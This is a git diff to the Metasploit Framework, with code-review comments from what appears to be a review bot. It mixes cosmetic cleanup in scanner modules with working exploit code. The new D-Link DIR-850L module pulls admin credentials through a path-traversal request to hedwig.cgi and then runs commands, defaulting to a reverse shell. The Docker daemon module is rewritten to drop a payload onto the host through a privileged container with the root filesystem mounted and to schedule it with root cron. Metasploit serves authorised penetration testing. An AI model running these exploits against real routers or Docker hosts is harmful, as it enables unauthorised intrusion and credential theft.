diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb index 45993f560b..fa495b4333 100644 --- a/modules/auxiliary/scanner/discovery/arp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb @@ -46,11 +46,11 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev shost = datastore['SHOST'] shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless shost + raise 'SHOST should be defined' unless shost smac = datastore['SMAC'] smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC should be defined' unless smac + raise 'SMAC should be defined' unless smac begin diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb index 00530de45c..78f2491524 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb @@ -49,11 +49,11 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless @shost + raise 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC should be defined' unless @smac + raise 'SMAC should be defined' unless @smac addrs = [] diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index cbf01588c4..747a276e7e 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb 
@@ -161,12 +161,12 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError ,'SHOST should be defined' unless @shost + raise 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces @smac ||= ipv6_mac - raise RuntimeError ,'SMAC should be defined' unless @smac + raise 'SMAC should be defined' unless @smac # Send router advertisement print_status("Sending router advertisement...") diff --git a/modules/auxiliary/scanner/http/chromecast_webserver.rb b/modules/auxiliary/scanner/http/chromecast_webserver.rb index c62019c8c5..82b9f1233e 100644 --- a/modules/auxiliary/scanner/http/chromecast_webserver.rb +++ b/modules/auxiliary/scanner/http/chromecast_webserver.rb @@ -37,12 +37,7 @@ class MetasploitModule < Msf::Auxiliary return unless (res && res.code == 200) - begin - json = JSON.parse(res.body) - rescue JSON::ParserError - return - end - + json = res.get_json_document name, ssid = json['name'], json['ssid'] if name && ssid diff --git a/modules/auxiliary/scanner/http/chromecast_wifi.rb b/modules/auxiliary/scanner/http/chromecast_wifi.rb index 63bd531a60..c68cfea3b1 100644 --- a/modules/auxiliary/scanner/http/chromecast_wifi.rb +++ b/modules/auxiliary/scanner/http/chromecast_wifi.rb @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary 'SortIndex' => -1 ) - JSON.parse(res.body).each do |wap| + res.get_json_document.each do |wap| waps_table << [ wap['bssid'], wap['signal_level'], diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index 59e07b41b2..14437759c5 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb 
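Review bot: `res.get_json_document.each do |wap|` in chromecast_wifi assumes the body parses to an Array; if I read Rex's `get_json_document` correctly it returns `{}` on a parse failure, and a Hash body (for instance an error object) would yield `[key, value]` pairs to the block, where `wap['bssid']` raises TypeError. Guarding the shape keeps the scan moving: `waps = res.get_json_document` / `return unless waps.is_a?(Array)` / `waps.each do |wap|`. The same shape question applies to the chromecast_webserver hunk above, though there the `name && ssid` check already covers the empty-Hash case. The enclosing method starts and ends outside the hunk.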
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.3(11d). }, - 'Author' => [ 'patrick', 'hdm' ], + 'Author' => [ 'aushack', 'hdm' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index d84ea5fbd7..ca445829d1 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ @@ -154,7 +154,7 @@ class MetasploitModule < Msf::Auxiliary 'ctype' => 'application/xml', 'headers' => { - #'Translate' => 'f', # Not required in PROPFIND, only GET - patrickw 20091518 + #'Translate' => 'f', # Not required in PROPFIND, only GET - aushack 20091518 }, 'data' => webdav_req + "\r\n\r\n", }, 20) diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 953c0ca9c6..2eaa0a1ac9 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary end version = res.headers['X-Jenkins'] - print_good("Jenkins Version - #{version}") + print_good("#{peer} - Jenkins Version #{version}") report_service( :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 8aaad8f9ef..41b7e500ee 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb 
+++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication. }, - 'Author' => [ 'et', 'patrick' ], + 'Author' => [ 'et', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ @@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary 'ctype' => 'application/xml', 'headers' => { - #'Translate' => 'f', # Not required in PROPFIND, only GET - patrickw 20091518 + #'Translate' => 'f', # Not required in PROPFIND, only GET - aushack 20091518 }, 'data' => webdav_req + "\r\n\r\n", }, 20) diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index 5e220ccb69..5d6f78714c 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary This module attempts to brute force SOAP/XML requests to uncover hidden methods. ), - 'Author' => ['patrick'], + 'Author' => ['aushack'], 'License' => MSF_LICENSE)) register_options( diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index 67950be71b..806752145c 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -28,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary ASSETBEGIN and ASSETEND values for greater results, or set VERBOSE. Information gathered may be used for later bruteforce attacks. }, - 'Author' => [ 'Troy Rose ', 'patrick' ], + 'Author' => [ 'Troy Rose ', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index 532b649332..092258531f 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb 
+++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary :exploited_at => Time.now.utc, :info => "Mongo server has no authentication." ) - print_good("Mongo server #{ip.to_s} dosn't use authentication") + print_good("Mongo server #{ip.to_s} doesn't use authentication") end disconnect rescue ::Exception => e diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 4d62a29ef2..05d8e86152 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -39,6 +39,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ + OptInt.new('MinRID', [ false, "Starting RID to check", 500 ]), OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]) ], self.class @@ -140,7 +141,6 @@ class MetasploitModule < Msf::Auxiliary # Fingerprint a single host def run_host(ip) - [[139, false], [445, true]].each do |info| @rport = info[0] @@ -227,8 +227,10 @@ class MetasploitModule < Msf::Auxiliary domain_sid || host_sid end + min_rid = datastore['MinRID'] # Brute force through a common RID range - 500.upto(datastore['MaxRID'].to_i) do |rid| + + min_rid.upto(datastore['MaxRID']) do |rid| stub = phandle + @@ -244,7 +246,6 @@ class MetasploitModule < Msf::Auxiliary NDR.long(1) + NDR.long(0) - dcerpc.call(15, stub) resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil @@ -295,6 +296,4 @@ class MetasploitModule < Msf::Auxiliary end end end - - end diff --git a/modules/auxiliary/scanner/varnish/varnish_cli_login.rb b/modules/auxiliary/scanner/varnish/varnish_cli_login.rb index c5cf4dba78..c5c16614b7 100644 --- a/modules/auxiliary/scanner/varnish/varnish_cli_login.rb +++ b/modules/auxiliary/scanner/varnish/varnish_cli_login.rb 
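Review bot: Nothing checks the new MinRID against MaxRID, so `min_rid.upto(datastore['MaxRID'])` with MinRID greater than MaxRID silently enumerates nothing and the module reports no users without saying why; a one-line guard before the loop, `fail_with(Failure::BadConfig, 'MinRID must not exceed MaxRID') if min_rid > datastore['MaxRID']` (or `print_error` plus `return` if fail_with is not available to this auxiliary class), makes the misconfiguration visible. The hunk also drops the `.to_i` from `datastore['MaxRID']`; OptInt should already normalise the value, so that is fine, but MinRID gets no lower bound and a value of 0 now walks the well-known RIDs the old hard-coded 500 skipped, which is presumably intended but deserves a mention in the option description. The loop body continues outside the hunk.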
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary ], 'Author' => [ - 'patrick', #original module + 'aushack', #original module 'h00die ' #updates and standardizations ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index f51b978acc..82c323aadd 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) if not icmp_response - raise RuntimeError ,"Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) if not icmp_response - raise RuntimeError , "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -192,7 +192,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) if not icmp_response - raise RuntimeError , "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index d79ce44402..d326baacbf 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb 
@@ -72,8 +72,8 @@ class MetasploitModule < Msf::Auxiliary @interface = get_interface_guid(@interface) @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError ,'SMAC is not defined and can not be guessed' unless @smac - raise RuntimeError ,'Source MAC is not in correct format' unless is_mac?(@smac) + raise 'SMAC is not defined and can not be guessed' unless @smac + raise 'Source MAC is not in correct format' unless is_mac?(@smac) @sip = datastore['LOCALSIP'] @sip ||= get_ipv4_addr(@interface) if @netifaces @@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary def arp_poisoning lsmac = datastore['LOCALSMAC'] || @smac - raise RuntimeError ,'Local Source Mac is not in correct format' unless is_mac?(lsmac) + raise 'Local Source Mac is not in correct format' unless is_mac?(lsmac) dhosts_range = Rex::Socket::RangeWalker.new(datastore['DHOSTS']) @dhosts = [] @@ -199,7 +199,7 @@ class MetasploitModule < Msf::Auxiliary end Kernel.select(nil, nil, nil, 0.50) end - raise RuntimeError, "No hosts found" unless @dsthosts_cache.length > 0 + raise "No hosts found" unless @dsthosts_cache.length > 0 # Build the local src hosts cache if datastore['BIDIRECTIONAL'] @@ -236,7 +236,7 @@ class MetasploitModule < Msf::Auxiliary end Kernel.select(nil, nil, nil, 0.50) end - raise RuntimeError, "No hosts found" unless @srchosts_cache.length > 0 + raise "No hosts found" unless @srchosts_cache.length > 0 end if datastore['AUTO_ADD'] diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index fbd10a7dbe..5cdcc5284a 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb 
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb b/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb new file mode 100644 index 0000000000..29645df2c8 --- /dev/null +++ b/modules/exploits/linux/http/dlink_dir850l_unauth_exec.rb 
@@ -0,0 +1,230 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'openssl' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DIR-850L (Un)authenticated OS Command Exec', + 'Description' => %q{ + This module leverages an unauthenticated credential disclosure + vulnerability to then execute arbitrary commands on DIR-850L routers + as an authenticated user. Unable to use Meterpreter payloads. + }, + 'Author' => [ + 'Mumbai', # https://github.com/realoriginal (module) + 'Zdenda' # vuln discovery + ], + 'References' => [ + ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'], + ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], + ], + 'DisclosureDate' => 'Aug 9 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' + }, + 'Privileged' => true, + 'Payload' => { + 'DisableNops' => true, + }, + 'Targets' => [[ 'Automatic', {} ]], + )) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + if res && res.headers['Server'] + auth = res.headers['Server'] + if auth =~ /DIR-850L/ + if auth =~ /WEBACCESS\/1\.0/ + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Detected + end + end + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + Exploit::CheckCode::Unknown + end + + def report_cred(opts) + service_data = { + address: opts[:ip], + port: opts[:port], + service_name: opts[:service_name], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + 
private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + + + # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well... + # should write an auxiliary module to-do -> WRITE AUXILIARY + def retrieve_creds + begin + xml = "\r\n" + xml << "\r\n" + xml << "\r\n" + xml << " ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml\r\n" + xml << "\r\n" + xml << "" + res = send_request_cgi({ + 'uri' => '/hedwig.cgi', + 'method' => 'POST', + 'encode_params' => false, + 'headers' => { + 'Accept-Encoding' => 'gzip, deflate', + 'Accept' => '*/*' + }, + 'ctype' => 'text/xml', + 'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}", + 'data' => xml, + }) + if res.body =~ /(.*)<\/password>/ # fixes stack trace issue + parse = res.get_xml_document + username = parse.at('//name').text + password = parse.at('//password').text + vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") + loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body) + print_good("#{peer} - Downloaded credentials to #{loot}") + return username, password + else + fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def retrieve_uid + begin + res = send_request_cgi({ + 'uri' => '/authentication.cgi', + 'method' => 'GET', + }) + parse = res.get_json_document + uid = parse['uid'] + challenge = parse['challenge'] + return uid, challenge + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def login(username, password) + uid, challenge = retrieve_uid + begin + hash = 
OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase + send_request_cgi({ + 'uri' => '/authentication.cgi', + 'method' => 'POST', + 'data' => "id=#{username}&password=#{hash}", + 'cookie' => "uid=#{uid}" + }) + return uid + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + def execute_command(cmd, opts) + uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command + payload = "\r\n" + payload << "\r\n" + payload << "\r\n" + payload << " DEVICE.TIME\r\n" + payload << " \r\n" + payload << " \r\n" + payload << "\r\n" + payload << "" + begin + # save configuration + res = send_request_cgi({ + 'uri' => '/hedwig.cgi', + 'method' => 'POST', + 'ctype' => 'text/xml', + 'data' => payload, + 'cookie' => "uid=#{uid}" + }) + # execute configuration + res = send_request_cgi({ + 'uri' => '/pigwidgeon.cgi', + 'method' => 'POST', + 'data' => 'ACTIONS=SETCFG,ACTIVATE', + 'cookie' => "uid=#{uid}" + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") + end + end + + + def exploit + print_status("#{peer} - Connecting to target...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") + end + # + # Information Retrieval, obtains creds and logs in + # + @username, @password = retrieve_creds + execute_cmdstager( + :flavor => :wget, + :linemax => 200 + ) + end +end diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb index c733b2440c..c77a5e8837 100644 --- a/modules/exploits/linux/http/docker_daemon_tcp.rb +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb 
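Review bot: `retrieve_creds` and `retrieve_uid` dereference the response without a nil check: `send_request_cgi` returns nil on a timeout, so `res.body =~ ...` and `res.get_json_document` raise NoMethodError instead of a clean `fail_with`, and the `rescue ::Rex::ConnectionError` does not cover that case. Likewise `parse.at('//name').text` raises if the element is missing even though the regex matched. I would add `fail_with(Failure::Unreachable, "#{peer} - No response from target") unless res` right after each request and use `Failure::Unreachable` rather than `Failure::Unknown` for the connection-error branches. In `execute_command` the local `payload = "\r\n"` shadows the module's `payload` method for the rest of that method; renaming it (e.g. `xml`) avoids a confusing read.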
@@ -33,9 +33,13 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DisclosureDate' => 'Jul 25, 2017', 'Targets' => [ + [ 'Linux x64', { + 'Arch' => ARCH_X64, + 'Platform' => 'linux' + }], [ 'Python', { - 'Platform' => 'python', 'Arch' => ARCH_PYTHON, + 'Platform' => 'python', 'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse noconn none tunnel' @@ -43,13 +47,14 @@ class MetasploitModule < Msf::Exploit::Remote } }] ], - 'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'Payload' => { 'Space' => 65000, 'DisableNops' => true }, + 'DefaultOptions' => { 'WfsDelay' => 180 }, 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(2375), - OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]), OptString.new('CONTAINER_ID', [ false, 'container id you would like']) ] ) @@ -57,22 +62,24 @@ class MetasploitModule < Msf::Exploit::Remote def check_image(image_id) vprint_status("Check if images exist on the target host") - res = send_request_raw( + res = send_request_cgi( 'method' => 'GET', - 'uri' => normalize_uri('images', 'json') + 'uri' => normalize_uri('images', 'json'), + 'ctype' => 'application/json' ) - return unless res and res.code == 200 and res.body.include? image_id + return unless res && res.code == 200 && res.body.include?(image_id) res end def pull_image(image_id) print_status("Trying to pulling image from docker registry, this may take a while") - res = send_request_raw( + res = send_request_cgi( 'method' => 'POST', - 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) + 'uri' => normalize_uri('images', 'create?fromImage=' + image_id), + 'ctype' => 'application/json' ) - return unless res.code == 200 + return unless res && res.code == 200 res end 
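Review bot: The new default `alpine:latest` is a mutable tag, so what `pull_image` fetches onto the target changes whenever the registry moves the tag and two runs of the module are not reproducible; this matters more now that the container is created privileged with the host root bind-mounted. I would pin a specific version tag or a digest (`alpine@sha256:...`), or at least state in the DOCKERIMAGE description that the tag is pulled unverified from the public registry. The Linux target's cron command only needs `base64` and `sh`, so a pinned small tag keeps the same footprint.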
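Review bot: `pull_image` still splices the operator-supplied DOCKERIMAGE straight into the path as `'create?fromImage=' + image_id` with no URL encoding, so a name containing `+` or a digest `@sha256:...` may be mis-parsed by the daemon. Since the call was switched to `send_request_cgi`, the encoded form is available: `'uri' => normalize_uri('images', 'create'), 'vars_get' => { 'fromImage' => image_id }`. `check_image` also matches with `res.body.include?(image_id)`, which reports a hit for any image whose name merely contains the string (`alpine:latest` inside `myorg/alpine:latest`); parsing the JSON and comparing `RepoTags` entries exactly would be more robust.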
@@ -88,12 +95,17 @@ class MetasploitModule < Msf::Exploit::Remote echo_cron_path = mnt_path + cron_path echo_payload_path = mnt_path + payload_path - cron_command = "python #{payload_path}" - payload_data = payload.raw + case target + when targets[0] # linux + command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& " + cron_command = payload_path + when targets[1] # python + command = "echo \"#{payload.raw}\" >> #{echo_payload_path} \&\& " + cron_command = "python #{payload_path}" + end - command = "echo \"#{payload_data}\" >> #{echo_payload_path} && " - command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && " - command << "echo \"\" >> #{echo_cron_path} && " + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& " + command << "echo \"\" >> #{echo_cron_path} \&\& " command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}" command @@ -108,25 +120,29 @@ class MetasploitModule < Msf::Exploit::Remote 'HostConfig' => { 'Binds' => [ '/:' + mnt_path - ] + ], + 'Privileged' => true, + 'UsernsMode' => 'host' } } end def del_container(container_id) - send_request_raw( + send_request_cgi( { 'method' => 'DELETE', - 'uri' => normalize_uri('containers', container_id) + 'uri' => normalize_uri('containers', container_id), + 'ctype' => 'application/json' }, 1 # timeout ) end def check - res = send_request_raw( + res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri('containers', 'json'), + 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' } ) @@ -135,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - if res and res.code == 200 and res.headers['Server'].include? 'Docker' + if res && res.code == 200 && res.headers['Server'].include?('Docker') return Exploit::CheckCode::Vulnerable end 
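Review bot: The new `case target` has no `else`, so if `target` matches neither entry `command` is never assigned and the following `command << ...` raises NoMethodError on nil rather than a clear module error; an `else fail_with(Failure::NoTarget, 'Unsupported target')` closes that. The `\&\&` escapes in the double-quoted strings are just `&&` in Ruby (an unknown escape yields the character itself), so they only make the strings harder to read and should be plain `&&`. For the Python branch, `payload.raw` is interpolated inside a double-quoted shell string; if the payload text ever contains `"` or `$` the echo breaks, so the base64 route used for the Linux target would be safer here too. The enclosing method starts and ends outside this hunk.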
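Review bot: `'Privileged' => true` is added next to the `/` bind mount without a comment saying why; writing to `/etc/cron.d` through the bind mount needs root inside the container (and `UsernsMode: 'host'` when the daemon remaps user namespaces) but, as far as I can tell from this hunk, not a privileged container, which widens the exploit's footprint on the target. If privileged is actually required on some daemon configuration, a one-line comment such as `# Privileged: required because ... (drop if plain bind-mount writes suffice)` would save the next reader the same question; otherwise I would drop it and keep `UsernsMode`.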
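Review bot: `res.headers['Server'].include?('Docker')` raises NoMethodError when the `Server` header is absent (a proxy in front of the daemon may strip it), which turns `check` into a crash instead of `CheckCode::Unknown`. `res.headers['Server'].to_s.include?('Docker')` keeps the same match while tolerating a missing header. check's body continues outside this hunk.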
@@ -161,10 +177,10 @@ class MetasploitModule < Msf::Exploit::Remote container_id = make_container_id # create container - res_create = send_request_raw( + res_create = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('containers', 'create?name=' + container_id), - 'headers' => { 'Content-Type' => 'application/json' }, + 'ctype' => 'application/json', 'data' => make_container(mnt_path, cron_path, payload_path).to_json ) fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201 @@ -173,25 +189,27 @@ class MetasploitModule < Msf::Exploit::Remote register_files_for_cleanup(cron_path, payload_path) # start container - send_request_raw( + send_request_cgi( { 'method' => 'POST', - 'uri' => normalize_uri('containers', container_id, 'start') + 'uri' => normalize_uri('containers', container_id, 'start'), + 'ctype' => 'application/json' }, 1 # timeout ) # wait until container stopped vprint_status("Waiting until the docker container stopped") - res_wait = send_request_raw( + res_wait = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('containers', container_id, 'wait'), + 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' } ) # delete container deleted_container = false - if res_wait.code == 200 + if res_wait && res_wait.code == 200 vprint_status("The docker container has been stopped, now trying to remove it") del_container(container_id) deleted_container = true diff --git a/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb b/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb index a16546c153..ead3740f3c 100644 --- a/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb 
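Review bot: The start request's response is discarded and `del_container` runs only when `res_wait` comes back with 200, so a start that fails, or a wait that times out, leaves a privileged container with the host root bind-mounted behind on the target. I would capture the start response and `fail_with(Failure::Unknown, 'Failed to start the docker container')` unless it is nil (the 1s timeout) or 204, and move `del_container(container_id)` into an `ensure` so the container is removed however the wait ended. The exploit method starts and ends outside this hunk.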
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote DGN2000v1 models. }, 'Author' => [ - 'Mumbai ', # module + 'Mumbai', # https://github.com/realoriginal (module) 'Robort Palerie ' # vuln discovery ], 'References' => [ diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index ba80ef54c8..928e5e0576 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote /piranha/secure/passwd.php3 script. The package installs with a default user and password of piranha:q which was exploited in the wild. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index 9a889be080..2a87b8a174 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote This vulnerability can only be exploited with a valid username and password. }, - 'Author' => [ 'patrick', 'jduck' ], + 'Author' => [ 'aushack', 'jduck' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index b4c8577fef..8eedfe4403 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -8,6 +8,8 @@ require 'drb/drb' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking + include Msf::Exploit::FileDropper + def initialize(info 